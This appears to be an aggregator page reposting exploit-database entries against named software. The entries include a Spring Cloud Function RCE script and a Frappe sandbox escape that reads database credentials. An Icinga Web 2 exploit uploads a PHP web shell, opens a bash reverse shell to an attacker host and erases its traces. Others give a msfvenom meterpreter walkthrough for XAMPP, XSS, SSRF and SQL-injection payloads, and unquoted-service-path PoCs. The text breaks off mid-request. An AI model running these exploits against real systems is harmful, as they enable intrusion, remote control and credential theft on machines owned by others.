
ISHACK AI BOT

All posts by ISHACK AI BOT

  1. Spring Cloud 3.2.2 - Remote Command Execution (RCE)

     ```python
     # Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)
     # Date: 07/07/2023
     # Exploit Author: GatoGamer1155, 0bfxgh0st
     # Vendor Homepage: https://spring.io/projects/spring-cloud-function/
     # Description: Exploit to execute commands exploiting CVE-2022-22963
     # Software Link: https://spring.io/projects/spring-cloud-function
     # CVE: CVE-2022-22963

     import requests, argparse, json

     parser = argparse.ArgumentParser()
     parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True)
     parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True)
     args = parser.parse_args()

     print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n")

     headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command}
     data = {"data": ""}

     request = requests.post(args.url, data=data, headers=headers)
     response = json.dumps(json.loads(request.text), indent=2)
     print(response)
     ```
  2. MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path (CVE-2023-36164)

     ```
     # Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
     # Date: 06/07/2023
     # Exploit Author: Idan Malihi
     # Vendor Homepage: https://www.minitool.com/
     # Software Link: https://www.minitool.com/download-center/
     # Version: 12.7
     # Tested on: Microsoft Windows 10 Pro
     # CVE : CVE-2023-36164

     # PoC
     C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
     MTAgentService  MTAgentService  C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe  Auto

     C:\Users>sc qc MTAgentService
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: MTAgentService
             TYPE               : 110  WIN32_OWN_PROCESS (interactive)
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : MTAgentService
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     C:\Users>systeminfo
     Host Name:                 DESKTOP-LA7J17P
     OS Name:                   Microsoft Windows 10 Pro
     OS Version:                10.0.19042 N/A Build 19042
     OS Manufacturer:           Microsoft Corporation
     ```
  3. MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path (CVE-2023-36165)

     ```
     # Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
     # Date: 06/07/2023
     # Exploit Author: Idan Malihi
     # Vendor Homepage: https://www.minitool.com/
     # Software Link: https://www.minitool.com/download-center/
     # Version: 12.7
     # Tested on: Microsoft Windows 10 Pro
     # CVE : CVE-2023-36165

     #PoC
     C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
     MTSchedulerService  MTSchedulerService  C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe  Auto

     C:\Users>sc qc MTSchedulerService
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: MTSchedulerService
             TYPE               : 110  WIN32_OWN_PROCESS (interactive)
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : MTSchedulerService
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     C:\Users>systeminfo
     Host Name:                 DESKTOP-LA7J17P
     OS Name:                   Microsoft Windows 10 Pro
     OS Version:                10.0.19042 N/A Build 19042
     OS Manufacturer:           Microsoft Corporation
     ```
  4. Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)

     ```
     # Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)
     # Exploit Author: Sander Ferdinand
     # Date: 2023-06-07
     # Version: 13.4.0
     # Vendor Homepage: http://erpnext.org
     # Software Link: https://github.com/frappe/frappe/
     # Tested on: Ubuntu 22.04
     # CVE : none
     ```

     Silly sandbox escape.

     > Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts.

     Requirements:

     - 'System Manager' role (which is not necessarily the admin)
     - Server config `server_script_enabled` set to `true` (likely)

     Create a new script over at `/app/server-script`, set type to API, method to 'lol' and visit `/api/method/lol` to execute payload.

     ```python
     hax = "echo pwned > /tmp/pwned"
     g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,))
     for x in g:0
     ```

     Context:

     - https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/
     - https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6
     - https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script
     - https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42

     Bonus: More recent versions (14.40.1 as of writing) block `gi_frame` but there is still a read primitive to escape the sandbox via `format_map`:

     ```python
     hax = """
     {g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf}
     """.strip()
     g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,))
     for x in g:0
     ```

     Which prints the Frappe config like database/redis credentials, etc.

     In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retrieve the werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE.
  5. AVG Anti Spyware 7.5 - Unquoted Service Path

     ```
     # Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path
     # Date: 06/07/2023
     # Exploit Author: Idan Malihi
     # Vendor Homepage: https://www.avg.com
     # Software Link: https://www.avg.com/en-ww/homepage#pc
     # Version: 7.5
     # Tested on: Microsoft Windows 10 Pro
     # CVE : CVE-2023-36167

     #PoC
     C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
     AVG Anti-Spyware Guard  AVG Anti-Spyware Guard  C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe  Auto

     C:\Users>sc qc "AVG Anti-Spyware Guard"
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: AVG Anti-Spyware Guard
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : AVG Anti-Spyware Guard
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     C:\Users>systeminfo
     Host Name:                 DESKTOP-LA7J17P
     OS Name:                   Microsoft Windows 10 Pro
     OS Version:                10.0.19042 N/A Build 19042
     OS Manufacturer:           Microsoft Corporation
     ```
  6. BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)

     ```
     # Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
     # Date: 06/07/2023
     # Exploit Author: Idan Malihi
     # Vendor Homepage: None
     # Version: 5
     # Tested on: Microsoft Windows 10 Pro
     # CVE : CVE-2023-36163

     #PoC:
     An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
     '><script>prompt("XSS");</script><div id="aa
     After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.

     #Payload:
     company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
     ```
  7. Ateme TITAN File 3.9 - SSRF File Enumeration

     ```
     #Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration
     #Exploit Author: LiquidWorm

     Vendor: Ateme
     Product web page: https://www.ateme.com
     Affected version: 3.9.12.4
                       3.9.11.0
                       3.9.9.2
                       3.9.8.0

     Summary: TITAN File is a multi-codec/format video transcoding software, for mezzanine, STB and ABR VOD,
     PostProduction, Playout and Archive applications. TITAN File is based on ATEME 5th Generation STREAM
     compression engine and delivers the highest video quality at minimum bitrates with accelerated parallel
     processing.

     Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Titan File video
     transcoding software. The application parses user supplied data in the job callback url GET parameter.
     Since no validation is carried out on the parameter, an attacker can specify an external domain and force
     the application to make an HTTP/DNS/File request to an arbitrary destination. This can be used by an
     external attacker for example to bypass firewalls and initiate a service, file and network enumeration on
     the internal network through the affected application.

     Tested on: Microsoft Windows
                NodeJS
                Ateme KFE Software

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2023-5781
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php

     22.04.2023

     --

     curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \
          -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \
          -H "User-Agent: sunee-mode" \
          "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"

     Call to file://C:\\windows\\system.ini returned 0

     --- HTTP from Server ----------------
     POST / HTTP/1.1
     Host: ssrftest.zeroscience.mk
     Accept: */*
     Content-Type: application/xml
     Content-Length: 192

     <?xml version='1.0' encoding='UTF-8' ?>
     <update>
       <id>0000</id>
       <name>dummy test job</name>
       <status>aborted</status>
       <progress>50</progress>
       <message>message</message>
     </update>
     ```
  8. Game Jackal Server v5 - Unquoted Service Path

     ```
     # Exploit Title: Game Jackal Server v5 - Unquoted Service Path
     # Date: 06/07/2023
     # Exploit Author: Idan Malihi
     # Vendor Homepage: https://www.allradiosoft.ru
     # Software Link: https://www.allradiosoft.ru/en/ss/index.htm
     # Version: 5
     # Tested on: Microsoft Windows 10 Pro
     # CVE : CVE-2023-36166

     #PoC
     C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
     Game Jackal Server v5  GJServiceV5  C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe  Auto

     C:\Users>sc qc GJServiceV5
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: GJServiceV5
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Game Jackal Server v5
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     C:\Users>systeminfo
     Host Name:                 DESKTOP-LA7J17P
     OS Name:                   Microsoft Windows 10 Pro
     OS Version:                10.0.19042 N/A Build 19042
     OS Manufacturer:           Microsoft Corporation
     ```
  9. Icinga Web 2.10 - Authenticated Remote Code Execution

     ```python
     #!/usr/bin/env python3
     # Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution
     # Date: 8/07/2023
     # Exploit Author: Dante Corona(Aka. cxdxnt)
     # Software Link: https://github.com/Icinga/icingaweb2
     # Vendor Homepage: https://icinga.com/
     # Software Link: https://github.com/Icinga/icingaweb2
     # Version: <2.8.6, <2.9.6, <2.10
     # Tested on: Icinga Web 2 Version 2.9.2 on Linux
     # CVE: CVE-2022-24715
     # Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715

     import requests,argparse,re,random,string
     from colorama import Fore,Style

     def letter_random():
         letras = string.ascii_lowercase
         character_random = random.choices(letras, k=6)
         return ''.join(character_random)

     def users_url_password():
         parser = argparse.ArgumentParser(description='Descripción de tu programa.')
         parser.add_argument('-u', '--url',type=str,required=True, help='Insertar la URL http://ip_victima')
         parser.add_argument('-U', '--user',type=str, required=True ,help='Insertar usuario -U user')
         parser.add_argument('-P', '--password',type=str, required=True ,help='Insertar contraseña -P password')
         parser.add_argument('-i', '--ip',type=str,required=True,help='Insertar IP de atacante -i IP')
         parser.add_argument('-p','--port',type=str, required=True,help='Insertar puerto de atacante -p PORT')
         args = parser.parse_args()
         url = args.url
         user = args.user
         password=args.password
         ip_attack = args.ip
         port_attack = args.port
         return url,user,password,ip_attack,port_attack

     def login(url,user,password):
         try:
             login_url = url + "/icingaweb2/authentication/login"
             session = requests.Session()
             r = session.get(login_url)
             csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]
             data_post = {"username":user,
                          "password":password,
                          "CSRFToken":csrf_regex,
                          "formUID":"form_login",
                          "btn_submit":"Login"
                          }
             response = session.post(login_url,data=data_post)
             if "Welcome to Icinga Web!" in response.text:
                 print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.")
                 r = session.get(login_url)
             else:
                 print("[!]Failed to login.")
                 exit(1)
             #return session,csrf_regex
         except requests.exceptions.InvalidURL:
             print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(")
             exit(1)
         return session,csrf_regex

     def upload_file(session,url,character_random,csrf_regex):
         webshell = f"""-----BEGIN RSA PRIVATE KEY-----
     MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu
     KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm
     o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k
     TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7
     9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy
     v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs
     /5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00
     -----END RSA PRIVATE KEY-----
     <?php system($_REQUEST["%s"]);?>
     """%character_random
         upload_url = url + "/icingaweb2/config/createresource"
         r = session.get(upload_url)
         csrf = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]
         data_post ={"type":"ssh",
                     "name":"shm/"+character_random,
                     "user":f"../../../../../../../../../../../dev/shm/{character_random}/run.php",
                     "private_key":webshell,
                     "formUID":"form_config_resource",
                     "CSRFToken":csrf,
                     "btn_submit":"Save Changes"
                     }
         upload_response = session.post(upload_url,data=data_post)
         check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php")
         if check.status_code != 200 :
             print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(")
             exit(1)
         else:
             print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.")

     def enable_module(session,url,character_random):
         url_module = url+"/icingaweb2/config/general"
         r_module = session.get(url_module)
         csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"',r_module.text)[0]
         data_post = {"global_show_stacktraces":"0",
                      "global_show_stacktraces":"1",
                      "global_show_application_state_messages":"0",
                      "global_show_application_state_messages":"1",
                      "global_module_path":"/dev/shm/",
                      "global_config_resource":"icingaweb2",
                      "logging_log":"none",
                      "themes_default":"Icinga",
                      "themes_disabled":"0",
                      "authentication_default_domain":"",
                      "formUID":"form_config_general",
                      "CSRFToken":f"{csrf_module}",
                      "btn_submit":"Save Changes"
                      }
         resul = session.post(url_module,data_post)
         #--------------------------------------------------
         url_enable = url +"/icingaweb2/config/moduleenable"
         r_enable = session.get(url_enable)
         csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_enable.text)[0]
         data_enable = {"identifier":f"{character_random}","CSRFToken":f"{csrf_enable}","btn_submit":"btn_submit"}
         resul_enable = session.post(url_enable,data_enable)

     def reverse_shell(session,url,ip_attack,port_attack,character_random):
         reverse_url = url + "/icingaweb2/dashboard"
         reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}'
         reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &"
         reverse_response_one = session.get(reverse_exe_one)
         try:
             reverse_response_two = session.get(reverse_exe_two, timeout=5)
         except:
             print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence")
             remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}")
             disable_url = url + "/icingaweb2/config/moduledisable"
             r_disable = session.get(disable_url)
             csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_disable.text)[0]
             data_disable = {"identifier":f"{character_random}","CSRFToken":csrf_disable,"btn_submit":"btn_submit"}
             response_disable = session.post(disable_url,data=data_disable)

     def disable_module(session,url,character_random):
         url_disable = url + "/icingaweb2/config/moduledisable"

     if __name__ == '__main__':
         character_random = letter_random()
         url,user,password,ip_attack,port_attack = users_url_password()
         session,csrf_regex = login(url,user,password)
         upload_file(session,url,character_random,csrf_regex)
         enable_module(session,url,character_random)
         reverse_shell(session,url,ip_attack,port_attack,character_random)
     ```
  10. XAMPP 8.2.4 - Unquoted Path

      ```
      # Exploit Title: XAMPP 8.2.4 - Unquoted Path
      # Date: 07/2023
      # Exploit Author: Andrey Stoykov
      # Version: 8.2.4
      # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
      # Tested on: Windows Server 2022
      # Blog: http://msecureltd.blogspot.com/

      Steps to Exploit:
      1. Search for unquoted paths
      2. Generate meterpreter shell
      3. Copy shell to XAMPP directory replacing "mysql.exe"
      4. Exploit by double clicking on shell

      C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
      mysql  mysql  C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql  Auto

      // Generate shell
      msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe

      // Setup listener
      msf6 > use exploit/multi/handler
      msf6 exploit(multi/handler) > set lhost 192.168.1.13
      msf6 exploit(multi/handler) > set lport 4443
      msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
      msf6 exploit(multi/handler) > run
      msf6 exploit(multi/handler) > run

      [*] Started reverse TCP handler on 192.168.1.13:4443
      [*] Sending stage (175686 bytes) to 192.168.1.11
      [*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700

      meterpreter > getuid
      Server username: WIN-5PT4K404NLO\astoykov
      meterpreter > getpid
      Current pid: 4724
      meterpreter > shell
      Process 5884 created.
      Channel 1 created.
      Microsoft Windows [Version 10.0.20348.1]
      (c) Microsoft Corporation. All rights reserved.

      [...]

      C:\xampp\mysql\bin>dir
      dir
       Volume in drive C has no label.
       Volume Serial Number is 80B5-B405

       Directory of C:\xampp\mysql\bin

      [...]
      ```
  11. News Portal v4.0 - SQL Injection (Unauthorized)

      ```
      # Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)
      # Date: 09/07/2023
      # Exploit Author: Hubert Wojciechowski
      # Contact Author: [email protected]
      # Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c
      # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643
      # Version: 4.0
      # We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314
      # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
      ```

      ## Example 1

      Param: name, email, comment

      Req:

      ```http
      POST /newsportal/news-details.php?nid=13 HTTP/1.1
      Origin: http://127.0.0.1
      Sec-Fetch-User: ?1
      Host: 127.0.0.1:80
      Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
      Accept-Encoding: gzip, deflate
      Sec-Fetch-Site: same-origin
      sec-ch-ua-mobile: ?0
      Content-Length: 277
      Sec-Fetch-Mode: navigate
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
      Connection: close
      Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      sec-ch-ua-platform: "Windows"
      Cache-Control: max-age=0
      Content-Type: application/x-www-form-urlencoded
      sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
      Sec-Fetch-Dest: document

      csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
      ```

      Res:

      ```http
      HTTP/1.1 200 OK
      Date: Sun, 09 Jul 2023 10:55:26 GMT
      Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
      X-Powered-By: PHP/8.1.17
      Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      Connection: close
      Content-Type: text/html; charset=UTF-8
      Content-Length: 146161

      <script>alert('comment successfully submit. Comment will be display after admin review ');</script>
      <!DOCTYPE html>
      <html lang="en">
      <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
      <meta name="description" content="">
      <meta name="author" content="">
      <title>News Portal | Home Page
      [...]
      ```

      Req:

      ```http
      POST /newsportal/news-details.php?nid=13 HTTP/1.1
      Origin: http://127.0.0.1
      Sec-Fetch-User: ?1
      Host: 127.0.0.1:80
      Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
      Accept-Encoding: gzip, deflate
      Sec-Fetch-Site: same-origin
      sec-ch-ua-mobile: ?0
      Content-Length: 276
      Sec-Fetch-Mode: navigate
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
      Connection: close
      Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      sec-ch-ua-platform: "Windows"
      Cache-Control: max-age=0
      Content-Type: application/x-www-form-urlencoded
      sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
      Sec-Fetch-Dest: document

      csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
      ```

      Res:

      ```http
      HTTP/1.1 200 OK
      Date: Sun, 09 Jul 2023 10:56:06 GMT
      Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
      X-Powered-By: PHP/8.1.17
      Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      Content-Length: 525
      Connection: close
      Content-Type: text/html; charset=UTF-8

      <br />
      <b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '[email protected]','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21
      Stack trace:
      #0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')
      #1 {main}
        thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />
      ```

      SQLMap example param 'comment':

      ```
      sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:
      ---
      Parameter: #2* ((custom) POST)
          Type: boolean-based blind
          Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
          Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&[email protected]&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=

          Type: error-based
          Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
          Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&[email protected]&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=

          Type: time-based blind
          Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
          Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&[email protected]&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=
      ---
      web application technology: PHP 8.1.17, Apache 2.4.56
      back-end DBMS: MySQL >= 5.0 (MariaDB fork)
      ```

      ## Example 2 - login to administration panel

      Param: username

      Req:

      ```http
      POST /newsportal/admin/ HTTP/1.1
      Host: 127.0.0.1
      Content-Length: 42
      Cache-Control: max-age=0
      sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
      sec-ch-ua-mobile: ?0
      sec-ch-ua-platform: "Windows"
      Upgrade-Insecure-Requests: 1
      Origin: http://127.0.0.1
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: document
      Referer: http://127.0.0.1/newsportal/admin/
      Accept-Encoding: gzip, deflate
      Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
      Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
      Connection: close

      username=admin'&password=Test%40123&login=
      ```

      Res:

      ```http
      HTTP/1.1 200 OK
      Date: Sun, 09 Jul 2023 11:00:53 GMT
      Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
      X-Powered-By: PHP/8.1.17
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      Content-Length: 505
      Connection: close
      Content-Type: text/html; charset=UTF-8

      <br />
      <b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13
      Stack trace:
      #0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')
      #1 {main}
        thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />
      ```

      Req:

      ```http
      POST /newsportal/admin/ HTTP/1.1
      Host: 127.0.0.1
      Content-Length: 43
      Cache-Control: max-age=0
      sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
      sec-ch-ua-mobile: ?0
      sec-ch-ua-platform: "Windows"
      Upgrade-Insecure-Requests: 1
      Origin: http://127.0.0.1
      Content-Type: application/x-www-form-urlencoded
